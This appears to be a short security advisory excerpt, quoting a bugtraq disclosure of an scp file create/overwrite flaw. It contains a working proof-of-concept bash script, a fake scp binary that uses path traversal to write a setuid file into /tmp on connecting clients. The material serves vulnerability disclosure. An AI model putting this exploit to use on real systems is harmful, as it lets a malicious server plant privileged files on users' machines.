scp File Create/Overwrite Vulnerability

scp File Create/Overwrite Vulnerability

Excerpted from original bugtraq posting by Michal Zalewski <lcamtuf@tpi.pl>
---
As a proof of concept, I created trivial scp replacement (put it on remote machine in the place of original scp binary - usually in /usr/local/bin).

It will try to exploit any file transfer, creating setuid /tmp/ScpIsBuggy file on client system:

#!/bin/bash

echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom of=/dev/stdout bs=200 count=1 2>/dev/null
dd if=/dev/zero of=/dev/stdout bs=1 count=2 2>/dev/null
---